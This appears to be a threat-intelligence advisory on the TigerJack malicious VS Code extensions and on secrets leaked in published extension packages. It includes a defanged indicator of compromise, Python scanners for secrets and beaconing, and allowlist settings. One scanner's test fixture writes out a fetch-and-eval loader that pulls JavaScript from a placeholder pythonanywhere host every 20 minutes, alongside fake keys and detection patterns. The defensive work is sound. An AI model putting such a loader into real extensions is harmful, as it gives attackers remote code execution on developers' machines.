VS Code Extension Ecosystem Targeted by TigerJack and Mass Credential Exposure
October 24th, 2025
High
Our Cyber Threat Intelligence Unit is monitoring two converging threats in the Visual Studio Code (VS Code) ecosystem: (1) widespread credential exposure in published extensions, and (2) a malicious extension campaign attributed to TigerJack. In October 2025, Wiz, CSO Online, and The Hacker News reported that over 500 VS Code extensions contained 550+ secrets, including 100+ Marketplace Personal Access Tokens (PATs) and 30+ Open VSX tokens. The exposed material (AI-provider API keys, cloud credentials, database credentials and the publishing tokens themselves) could allow attackers to push trojanized updates to legitimate extensions or publish fraudulent ones, turning developer tooling into a malware delivery channel. Meanwhile, TigerJack distributed backdoored extensions that exfiltrate data, log keystrokes, mine cryptocurrency, and retrieve remote payloads. Despite takedowns, multiple TigerJack extensions reappeared on Open VSX and other registries, extending exposure beyond Microsoft's Marketplace. Together these events highlight the rising software-supply-chain risk and the need for better token hygiene, extension governance, and endpoint visibility.
Technical Details
Attack Type: Supply-chain compromise via malicious or compromised extensions.
Severity: High.
Delivery Vectors:
Leaked tokens: Exposed PATs and API keys within .vsix packages allow adversaries to push modified updates to legitimate extensions or republish under existing publisher identities.
Malicious publishers: Threat actors upload malicious extensions to both VS Code Marketplace and Open VSX, performing code execution through dynamically fetched JavaScript or embedded eval() routines.
Techniques Observed:
Embedded secrets include OpenAI, Gemini, Anthropic, and Hugging Face API keys; cloud service credentials; and Marketplace/Open VSX PATs.
TigerJack extensions impersonate legitimate utilities (e.g., “C++ Playground,” “HTTP Format”) and implement:
Periodic remote JavaScript fetch-and-execute from ab498.pythonanywhere[.]com/static/in4.js every ~20 minutes.
Credential and source-code harvesting from local workspaces.
CoinIMP-based cryptocurrency mining and resource abuse.
Keystroke capture and event monitoring to exfiltrate developer input.
Cross-registry persistence: Extensions removed from Microsoft’s Marketplace were later re-uploaded to Open VSX or cloned under alternate publisher names, evading static reputation checks.
Vendor Mitigation: Microsoft revoked compromised PATs and deployed automated secret-scanning for all new and updated extensions (effective September 22, 2025).

Impact
A compromised Marketplace or Open VSX token enables malicious updates to automatically deploy to users with extension auto-update enabled, potentially converting a token leak into a mass compromise channel.
Stolen API keys and source code can result in intellectual-property theft, account takeover, or unauthorized cloud usage.
Malicious extensions run with the developer's own privileges, allowing local file exfiltration, injection of backdoors into source trees, and access to internal services using credentials found in the workspace or in synced settings.
Because these extensions often retain full functionality, they can remain installed and undetected for extended periods while periodically retrieving new malicious payloads.
Detection Method
Maintain a centralized inventory of all extensions in use and flag any with publisher metadata changes or unverified sources.
Perform static scanning of .vsix packages and unpacked extensions for embedded secrets (PATs, API keys, cloud credentials).
Monitor Code.exe (on Windows) and the equivalent VS Code processes on macOS and Linux for:
Outbound requests to pythonanywhere[.]com or dynamic JavaScript hosts every ~20 minutes.
Repeated use of eval() on fetched code.
File-read attempts in workspace directories or credential stores.
CPU spikes consistent with mining activity.
Correlate extension-update events with outbound connections or anomalous network activity from developer machines.
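The static-scanning step above can be automated against the .vsix package itself, which is an ordinary zip archive. The following is an added example, not tooling from the advisory or from any of the cited reports: it unpacks a package in memory, looks for secret-shaped strings (the 52-character lowercase form for Azure DevOps/Marketplace PATs and the `sk-` prefix for OpenAI/Anthropic-style keys are heuristics, an assumption on my part) and for the fetch-and-eval loader pattern attributed to TigerJack, then returns a block/review/pass verdict. The sample package, every token in it and the `example-actor.pythonanywhere.com` host are constructed test data.

```python
"""Static triage of a .vsix package (a zip archive) for embedded secrets and
fetch-and-eval loader behaviour. Added example; the .vsix built below and
every token in it are constructed, and the pythonanywhere host is a placeholder."""
import io
import json
import re
import zipfile

# Secret-shaped strings. Exact token formats vary by vendor; the 52-character
# lowercase pattern (Azure DevOps / Marketplace PATs) and the "sk-" prefix
# (OpenAI/Anthropic-style keys) are heuristics, i.e. assumptions.
SECRET_PATTERNS = {
    "sk_family_key": re.compile(r"\bsk-[A-Za-z0-9_-]{20,}\b"),
    "huggingface_token": re.compile(r"\bhf_[A-Za-z0-9]{30,}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b"),
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "azdo_pat": re.compile(r"\b[a-z0-9]{52}\b"),
}

# Loader behaviour described for the TigerJack extensions: a timer, a fetch
# from a pythonanywhere.com host, and eval()/new Function() on the response.
BEHAVIOUR_PATTERNS = {
    "periodic_timer": re.compile(r"\bsetInterval\s*\("),
    "remote_fetch": re.compile(r"""https?://[\w.-]+\.pythonanywhere\.com/[^\s'"]*"""),
    "eval_of_variable": re.compile(r"\beval\s*\(\s*[A-Za-z_$][\w$.]*\s*\)"),
    "new_function_ctor": re.compile(r"\bnew\s+Function\s*\("),
    "coinimp_miner": re.compile(r"coinimp", re.I),
}

TEXT_SUFFIXES = (".js", ".mjs", ".cjs", ".ts", ".json", ".env", ".yml", ".yaml", ".txt", ".md")


def redact(secret: str) -> str:
    """Keep only the ends so a finding can be triaged without re-leaking the value."""
    return secret[:4] + "..." + secret[-4:] if len(secret) > 12 else "***"


def scan_vsix(vsix_bytes: bytes) -> dict:
    """Return secret and behaviour findings for every text member of the package."""
    findings = {"secrets": [], "behaviours": []}
    with zipfile.ZipFile(io.BytesIO(vsix_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(TEXT_SUFFIXES):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            for kind, pattern in SECRET_PATTERNS.items():
                for match in pattern.finditer(text):
                    findings["secrets"].append((info.filename, kind, redact(match.group(0))))
            for kind, pattern in BEHAVIOUR_PATTERNS.items():
                if pattern.search(text):
                    findings["behaviours"].append((info.filename, kind))
    return findings


def verdict(findings: dict) -> str:
    """'block' on a publishing token or a remote fetch-and-eval chain,
    'review' on any other hit, otherwise 'pass'."""
    kinds = {kind for _, kind in findings["behaviours"]}
    publish_token = any(kind == "azdo_pat" for _, kind, _ in findings["secrets"])
    fetch_and_eval = "remote_fetch" in kinds and bool(kinds & {"eval_of_variable", "new_function_ctor"})
    if publish_token or fetch_and_eval:
        return "block"
    if findings["secrets"] or kinds:
        return "review"
    return "pass"


def build_sample_vsix(malicious: bool) -> bytes:
    """Construct a minimal .vsix in memory. All names and values are fake test data."""
    package_json = {"name": "http-format", "publisher": "example-publisher",
                    "version": "1.0.0", "main": "./out/extension.js"}
    if malicious:
        loader = (
            'const https = require("https");\n'
            '// constructed host, not the live indicator\n'
            'const URL = "https://example-actor.pythonanywhere.com/static/stage2.js";\n'
            'function pull() { https.get(URL, r => { let body = ""; r.on("data", c => body += c);'
            ' r.on("end", () => eval(body)); }); }\n'
            'exports.activate = () => { pull(); setInterval(pull, 20 * 60 * 1000); };\n'
        )
        env_file = "OPENAI_API_KEY=sk-FAKEFAKEFAKEFAKEFAKEFAKEFAKE\n"  # fake key
        publish_cfg = {"pat": "f" * 26 + "0" * 26}  # 52 lowercase chars, fake PAT
    else:
        loader = ('const vscode = require("vscode");\nexports.activate = ctx => {\n'
                  '  ctx.subscriptions.push(vscode.commands.registerCommand("httpFormat.run", () => {}));\n};\n')
        env_file = ""
        publish_cfg = {"registry": "https://marketplace.visualstudio.com"}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("extension/package.json", json.dumps(package_json))
        zf.writestr("extension/out/extension.js", loader)
        zf.writestr("extension/.env", env_file)
        zf.writestr("extension/scripts/publish.json", json.dumps(publish_cfg))
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        result = scan_vsix(build_sample_vsix(flag))
        print("malicious" if flag else "clean", verdict(result), result)
```

Run it against real packages by passing the bytes of a downloaded .vsix to `scan_vsix`; a `block` verdict on an extension already in your inventory is exactly the case where its publisher token should be treated as compromised and rotated.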
Indicators of Compromise
| Type | Indicator | Description |
| --- | --- | --- |
| Domain | ab498.pythonanywhere[.]com | Observed remote fetch endpoint used by malicious VS Code extensions to retrieve remote code. |
| Path | /static/in4.js | Used by TigerJack extensions to periodically fetch remote JS payloads (~20-minute intervals). |
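The indicator is more useful as a cadence than as a bare domain: the same path requested again and again at roughly 20-minute intervals from an editor process is a stronger signal than a single hit. The following hunt is an added example (not tooling from the advisory or the cited reports) that groups proxy log lines by endpoint and process, keeps those that touch any pythonanywhere.com host on the IOC path, and flags groups whose median inter-request gap sits near 20 minutes. The log lines and the `example-actor.pythonanywhere.com` subdomain are constructed; the live indicator is the one in the table.

```python
"""Hunt proxy logs for the beacon cadence in the IOC table: repeated requests to a
pythonanywhere.com host for /static/in4.js about every 20 minutes.
Added example; the log lines are constructed and the subdomain is a placeholder."""
from collections import defaultdict
from datetime import datetime
from statistics import median
from urllib.parse import urlsplit

# Constructed proxy log, one request per line:
# <ISO-8601 UTC timestamp> <endpoint> <process image> <url>
SAMPLE_LOG = """\
2025-10-20T09:00:03Z dev-ws-17 Code.exe https://example-actor.pythonanywhere.com/static/in4.js
2025-10-20T09:00:41Z dev-ws-17 Code.exe https://marketplace.visualstudio.com/_apis/public/gallery/extensionquery
2025-10-20T09:13:00Z dev-ws-22 Code.exe https://example-actor.pythonanywhere.com/static/in4.js
2025-10-20T09:20:05Z dev-ws-17 Code.exe https://example-actor.pythonanywhere.com/static/in4.js
2025-10-20T09:40:02Z dev-ws-17 Code.exe https://example-actor.pythonanywhere.com/static/in4.js
2025-10-20T10:00:04Z dev-ws-17 Code.exe https://example-actor.pythonanywhere.com/static/in4.js
2025-10-20T10:05:00Z dev-ws-22 chrome.exe https://example-actor.pythonanywhere.com/static/in4.js
"""

IOC_HOST_SUFFIX = ".pythonanywhere.com"
IOC_PATH = "/static/in4.js"


def is_ioc_request(url: str) -> bool:
    """Match any pythonanywhere.com subdomain serving the IOC path."""
    parts = urlsplit(url)
    return (parts.hostname is not None
            and parts.hostname.endswith(IOC_HOST_SUFFIX)
            and parts.path == IOC_PATH)


def parse_ioc_hits(log_text: str) -> dict:
    """Map (endpoint, process) -> sorted request timestamps for IOC requests only."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, endpoint, process, url = line.split(maxsplit=3)
        if is_ioc_request(url):
            hits[(endpoint, process)].append(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"))
    for times in hits.values():
        times.sort()
    return dict(hits)


def hunt_beacons(hits: dict, expected_minutes: float = 20.0,
                 tolerance_minutes: float = 3.0, min_hits: int = 3) -> list:
    """Return (endpoint, process, hit_count, median_gap_minutes) for every group
    whose IOC requests recur at roughly the expected cadence. Single hits are
    still IOC matches (see parse_ioc_hits); this isolates the beaconing ones."""
    flagged = []
    for (endpoint, process), times in sorted(hits.items()):
        if len(times) < min_hits:
            continue
        gaps = [(b - a).total_seconds() / 60 for a, b in zip(times, times[1:])]
        cadence = median(gaps)
        if abs(cadence - expected_minutes) <= tolerance_minutes:
            flagged.append((endpoint, process, len(times), round(cadence, 1)))
    return flagged


if __name__ == "__main__":
    contacts = parse_ioc_hits(SAMPLE_LOG)
    for key, times in contacts.items():
        print("IOC contact:", key, len(times), "request(s)")
    print("beaconing:", hunt_beacons(contacts))
```

Every key returned by `parse_ioc_hits` deserves a look regardless of cadence; `hunt_beacons` simply ranks the ones that match the 20-minute loader behaviour, so they can be triaged first.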

Recommendations
Inventory and Freeze Extensions: Enumerate all extensions deployed across developer endpoints and CI runners; disable or remove unverified publishers.
Rotate All Leaked Secrets: Treat any exposed token as compromised and immediately rotate Marketplace/Open VSX PATs, AI provider keys, and cloud credentials.
Control Updates: Disable automatic extension updates in sensitive environments and require centralized approval for updates.
Enforce Extension Allowlists: Restrict installations to vetted publishers and extensions via managed policies (e.g., the extensions.allowed setting delivered through enterprise policy rather than left to per-user settings).
Implement Secret Scanning: Integrate pre-deployment scanning to detect embedded keys in extensions, dependencies, or build artifacts.
Endpoint Monitoring: Hunt for outbound connections to known malicious hosts and unusual Code.exe process behaviour, including CPU anomalies or remote script fetches.
Source Control Hygiene: Periodically audit workspace files for injected scripts or modified JavaScript dependencies.
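The Control Updates and Enforce Extension Allowlists items above map onto a handful of VS Code settings. The file below is an added example, not a fragment from the advisory or from Microsoft's documentation: the publisher and extension ids and the pinned version are illustrative, and the extensions.allowed setting is assumed to be available (it was introduced in VS Code 1.96). Because a user can edit their own settings.json, the hardened values only hold when they are pushed and locked through device-management policy.

```jsonc
{
  // Before (the defaults): extensions update themselves as soon as a new
  // version is published, so a leaked publisher PAT reaches every user
  // of the extension without any action on their part.
  //   "extensions.autoUpdate": true,
  //   "extensions.autoCheckUpdates": true,

  // After: no silent updates. New versions are rolled out through the
  // organisation's own approval step instead of the Marketplace's.
  "extensions.autoUpdate": false,
  "extensions.autoCheckUpdates": false,

  // Allowlist. Keys are publisher ids or extension ids; values are true/false,
  // "stable" (no pre-release builds) or a list of permitted versions.
  // The "*": false entry blocks everything not listed explicitly.
  "extensions.allowed": {
    "ms-python.python": "stable",
    "esbenp.prettier-vscode": ["11.0.0"],   // illustrative pinned version
    "github": true,                          // whole publisher (illustrative)
    "example-publisher": false,              // illustrative explicit deny
    "*": false
  }
}
```

Pinning to a version list is the strongest form, since it also stops a legitimately signed but trojanized update; allowing a whole publisher (the `github` entry) reintroduces the publisher-token risk this advisory describes. Editors that use Open VSX (VSCodium, Cursor and similar) need the equivalent control in their own configuration, as these settings govern VS Code only.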
Conclusion
The combination of massive secret exposure and an active malicious extension campaign associated with TigerJack represents a high-impact software-supply-chain threat to developer ecosystems. A single leaked PAT can enable an attacker to weaponize a trusted extension and distribute malware at scale. We urge organizations to catalogue extensions immediately, rotate tokens, and enforce extension governance across developer environments. Continuous monitoring for malicious network activity, coupled with pre-publish secret scanning, is essential to mitigate the downstream risk to code integrity and enterprise infrastructure.